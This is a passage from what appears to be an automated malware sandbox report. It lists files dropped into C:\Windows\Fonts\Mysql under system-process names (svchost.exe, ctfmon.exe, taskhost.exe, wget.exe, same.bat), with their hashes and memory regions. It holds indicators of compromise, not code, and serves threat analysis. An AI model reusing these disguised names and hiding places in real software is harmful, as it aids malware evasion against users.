                                                                                                                                                                                                                                                      542585c37a688d49f62d5d8e31f461bca2132de7ca9fb7610c59588edc20dc4a

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      7060a3bd156a01a88c9982999fdd5fa6aabea675d66dd1c00485752029315f05730d30809de5696c142ceea5c47d829cc4cc575b5b23105c337f15645035f9d0

                                                                                                                                                                                                                                                    • C:\Windows\Fonts\Mysql\same.bat

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      11KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      07986ecd5f759e85db37302bd0493ea4

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      aec5bfe87cf052ca8dd4c909e5a35ff670c08edb

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      6b891a659b3a17c238918533f704c9d47f6e2f958f94a23cace19c6922cb4829

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      ca8df30baf3a11823d0f415433c0dbf10694ffdad935189136327bd02ba150786db410dbaf4e223e0d1988b13323625675664b9642163cfddff26d669fd09a22

                                                                                                                                                                                                                                                    • C:\Windows\Fonts\Mysql\svchost.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      256KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      7afcf45907f225e3e3cfeece3bbcd410

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      9747e4c11bcf0393e1d1a2ac4b7c43af590da0bc

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      c5a346bd16c246db669605c70a547204313c0fa2325332a3d8427a4449e5b40e

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      ce091728b83bc4edb57dfbbeec4ce0de0220de82965ae3b2d6f71ce822be60a81c28ef7c605a8411c1113ee23513e06670029ec3b7af09ab0682b0358064c44f

                                                                                                                                                                                                                                                    • C:\Windows\Fonts\Mysql\svchost.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      220KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      d19622ae565744bab6d9a7fc12cce443

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      5ff938b91688cdc7bdb3aa1c80e5267883c343bf

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      96cebf39c9a9fb56c95b5899f1620ad73282a620ce0bea74e27a4858403ce9e4

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      5d089505674958671ffb186ccc849ad1346bf9bcf3fe992e5ee03d09dde21e9ae90abf32e634ad538ffb7ec05823aa95320fb1f4155f68d97ea64a9394a8c652

                                                                                                                                                                                                                                                    • C:\Windows\Fonts\Mysql\svchost.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      232KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      dd8e72dc6e4366e47ac3c71d495cbb6b

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      31ac29ee08cb214e0cfbdcb80245d08e58b4a3cd

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      8f05f88b881d51ffc301075b02120e54a1d0065939ef0ac12329139b89671fd6

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      7d1f123266ee65dd2100116c3e814d22137595f5f3bf846cdf2bcc47c35c81b424caa3afafc48e19d6f92f652969aae38bef56adb855c8a95c765ce13362b5d4

                                                                                                                                                                                                                                                    • C:\Windows\Fonts\Mysql\svchost.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      150KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      7904a1add3defbd2891625feec9b06ec

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      bff4d3ad5db4fd0b444d7f53bb8e18c8c1d0caa9

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      a8b2417f30ebc882d5e88e5b473913dd798a7d701c98de5fcdfad1d29c7382dd

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      686f002e6460d09be7c91cc1a9f943fc9ba3aa98a6a166ee0e354b7e2ae86c414adae7ce470b1f0e0166b962916ba71b577d6e17568f5c27b7ff5911ae47a200

                                                                                                                                                                                                                                                    • C:\Windows\Fonts\Mysql\svchost.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      45KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      307c298cb7695f6ccca3025493aaccec

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      15af39299ee2d8cfc8d246a70ae3fefd42e47257

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      9c6a83e8c38dd3f120d6165c09b8847f1da98d352919498d365ede6c97140ca7

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      e341819c09ad65d92538ee93c6717ddf2ac9d8a7a68192a82ce5962151ff62cd4da4d4a11b12f64a97e4b7257e30f92804a70ce6fa437466373d51030c823513

                                                                                                                                                                                                                                                    • C:\Windows\Fonts\Mysql\svchost.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      104KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      4fc4ca6811e3a85b4f9c0d13cc90cc98

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      ebd0b28d689cc18c2aa47125c4848c7b8c72c0b7

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      11990417f0016c6018b9f010e941ecf39fc7e08d09d6b799649c743cecaee3e6

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      a399538b23985f5f1df5a834111d64ddee535fcdee05b1e2733ed503f7f64369a63cdc955c717fd24610497685716d355bb3158cafd53125ad53472ca2a372db

                                                                                                                                                                                                                                                    • C:\Windows\Fonts\Mysql\svchost.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      98KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      018765099c9e56667a9cde4ac895b9ae

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      287ec71429242c5c372ab81caae7f0d0da728f2b

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      026cf2ecb3ed76f9d52cba8cfff956e95222592384177c0e64b524a7006c03bc

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      2522049620a29b246e1e7034424aebffe47e76699083e1447fed532312011e61771f2641d4eeb73b8ea00bd947e4dc759b8d160e15d3ed0fb08473ca2da914a3

                                                                                                                                                                                                                                                    • C:\Windows\Fonts\Mysql\svchost.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      40KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      c07a7f4ca59f6b886a4fd8759c1ccba9

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      fca4e0353c1fba0023bdcc99b93c10adebfbbe26

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      9b6a35d9610d2a293a2aaa4ccb553f9acc4704eac55c36fd1c8c3f900de8fbd1

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      af6ccd6c15220e381ade8886eae85310a171220ecf51fd4e87cd12d5604bffc580e8124b2a17bfd000c43e3be486a6146d74552f4e5678222ea7d410203000ee

                                                                                                                                                                                                                                                    • C:\Windows\Fonts\Mysql\taskhost.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      14KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      c097fd043d3cbabcada0878505c7afa5

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      966a60028a3a24268c049ffadbe1a07b83de24ce

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      1328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      0837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0

                                                                                                                                                                                                                                                    • C:\Windows\Fonts\Mysql\temp.txt

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      12B

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      8cf4dec152a9d79a3d62202b886eda9b

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      0c1b3d3d02c0b655aa3526a58486b84872f18cc2

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      c30e56c9c8fe30ffa4a4ff712cf2fa1808ee82ca258cd4c8ebefcc82250b6c01

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      a5a65f0604f8553d0be07bd5214db52d3f167e7511d29cb64e3fa9d8c510cc79976ff2a5acb9b8c09b666f306ac8e4ad389f9a2de3ca46d57b1e91060a4c50fd

                                                                                                                                                                                                                                                    • C:\Windows\Fonts\Mysql\wget.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      392KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      bd126a7b59d5d1f97ba89a3e71425731

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      457b1cd985ed07baffd8c66ff40e9c1b6da93753

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

                                                                                                                                                                                                                                                    • \Users\Admin\AppData\Local\Temp\xsfxdel~.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      37KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      a48b642733b4ed0b2f63c726bea5710f

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      f383f6eb661b6aea3da2f4f2b21b2cbc40ced2a2

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      58361275c9ce4b07a6ee13ddc83f80e88571ea9d4e1aedc476f7d613938b47a6

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      3f43721db1ec77ff2c31e6269bed3bd6e6c0d7577cfcfe913d771da19154819e6868d995f29830623ec568b666d17639b1dd3f2e0e6bf2a21ab4b43f967a9ef6

                                                                                                                                                                                                                                                    • \Windows\Fonts\Mysql\ctfmon.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      1.3MB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      d823b8d5a5fdc3fc30cbbc76ffadcafc

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      005c3d8ca2bb748cb989c43d23f15dc343c78a07

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      cdb648a2f50229bc3cece2a260bb147c138e61600b22a514fe70f4460caf6a8a

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      9a22c0a337ed7b0a234d309d61704fd373256301e8d427f60ef390c95ec8aff5d6b27003702351b0e24bca1fdbd1b9faf89a18d25ca6c26eacb8d3ed5e419351

                                                                                                                                                                                                                                                    • \Windows\Fonts\Mysql\ctfmon.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      990KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      526a0c8bb73b0d62e5409c8220a59fe1

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      da657600062345967dbdd19d94870742b8a7615d

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      4a7bb15f18daf41cacdb167056b8addc355c7c5c216a48c8108561bb911056c3

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      10c3e9ddfc2a5505f90d4a9f0e25be35fb9fe2a20dcaefd98fff3590baa2c2ceb96299f1b25031691698ae6a9fffbf098944e10a76d747ea28e68fc1d09f1e41

                                                                                                                                                                                                                                                    • \Windows\Fonts\Mysql\svchost.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      153KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      33d1519b1e46caa1586b03e038ca70ed

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      f3c888dc27a29bbf05e7ef92314665cd296acd91

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      8aa1eff9ce3a86c993837b631f2062ac02c4cb5ab0d660f6b2e3ad4fbe204f18

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      ff8c0bc40fefbd3220ffe31a1d0d1fa58c38dab4377f6c0bfe04201ab1a6c7b325c6718a1c82d56d42889023aa1d1aa72145a6119a2db958cc678933f52e5b13

                                                                                                                                                                                                                                                    • \Windows\Fonts\Mysql\svchost.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      160KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      d1eea115c405eb795aee7a295e1b0fde

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      300a8664616d2cc9739d1b6657d1fb0f0e5773e4

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      cd63d882cc1ccffb0d976041de69261796c129f560a7ddfdc905d8a0069c5dd8

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      b86a45313e935f2799cb3e822e96441ad9e0782706271683c39fd6d27268a87253f5b7aa5c6cce29fea7ca461029514331d33b04dded35c69e17b3eb92efdf1d

                                                                                                                                                                                                                                                    • \Windows\Fonts\Mysql\wget.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      287KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      623b7e15516f4896e515be2a81e26cbf

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      4b6fc7fb2f36b728c70a19a6be897b327dcc358d

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      ff9b58168b2f098119e035a6868f20d74915eb4c9fb55a3b796f6d90071d14b5

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      f2df365115eace102ff4bc07c20ebef843bad0e5fd17d543ac8ee9c2ec8f4e26ccd3c8b4dc8f050257bec8062f33b9d9ef83991de9de761bdacdda841e203df4

                                                                                                                                                                                                                                                    • memory/1380-115-0x00000000000C0000-0x00000000000CE000-memory.dmp

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      56KB

                                                                                                                                                                                                                                                    • memory/1380-117-0x00000000000C0000-0x00000000000CE000-memory.dmp

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      56KB

                                                                                                                                                                                                                                                    • memory/1380-121-0x0000000000CB0000-0x0000000000D9F000-memory.dmp

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      956KB

                                                                                                                                                                                                                                                    • memory/1380-107-0x0000000000CB0000-0x0000000000D9F000-memory.dmp

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      956KB

                                                                                                                                                                                                                                                    • memory/1808-84-0x0000000000400000-0x0000000000E2E000-memory.dmp

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      10.2MB

                                                                                                                                                                                                                                                    • memory/1808-21-0x0000000003290000-0x0000000003A39000-memory.dmp

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      7.7MB

                                                                                                                                                                                                                                                    • memory/1808-20-0x0000000003290000-0x0000000003A39000-memory.dmp

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      7.7MB

                                                                                                                                                                                                                                                    • memory/2564-85-0x0000000000400000-0x0000000000410000-memory.dmp

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      64KB

                                                                                                                                                                                                                                                    • memory/2688-23-0x0000000000400000-0x0000000000BA9000-memory.dmp

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      7.7MB

                                                                                                                                                                                                                                                    • memory/2688-75-0x0000000000400000-0x0000000000BA9000-memory.dmp

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      7.7MB

                                                                                                                                                                                                                                                    • memory/2688-22-0x0000000000400000-0x0000000000BA9000-memory.dmp

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      7.7MB

                                                                                                                                                                                                                                                    • memory/2768-110-0x0000000000400000-0x00000000004EF000-memory.dmp

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      956KB

                                                                                                                                                                                                                                                    • memory/2768-108-0x0000000000400000-0x00000000004EF000-memory.dmp

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      956KB